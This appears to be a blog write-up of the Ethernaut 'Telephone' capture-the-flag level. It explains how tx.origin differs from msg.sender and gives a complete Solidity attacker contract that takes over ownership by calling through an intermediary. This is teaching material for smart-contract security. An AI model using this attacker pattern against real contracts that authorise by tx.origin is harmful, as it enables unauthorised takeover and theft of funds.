Ethernaut Puzzle 04 Telephone

Posted on Edited on In

This puzzle asks us to claim the ownership of this given smart contract. From the codes, we can see, the way for us to get the ownership is to let tx.origin and msg.sender different.

Here we list the defination of tx.origin and msg.sender:

  • tx.origin (address): sender of the transaction (full call chain)
  • msg.sender (address): sender of the message (current call)

If contract A calls B, and B calls C, in C, msg.sender is B and tx.origin is A.

So for this problem, we need to write a smart contract to invoke the changeOwner of smart contract Telephone.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
// SPDX-License-Identifier: MIT
pragma solidity ^0.7.3;

interface ITelephoneChallenge {
    function changeOwner(address _owner) external;
}

contract TelephoneAttacker {
    ITelephoneChallenge public challenge;

    constructor(address challengeAddress) {
        challenge = ITelephoneChallenge(challengeAddress);
    }

    function attack() external payable {
        challenge.changeOwner(tx.origin);
    }

    receive() external payable {}
}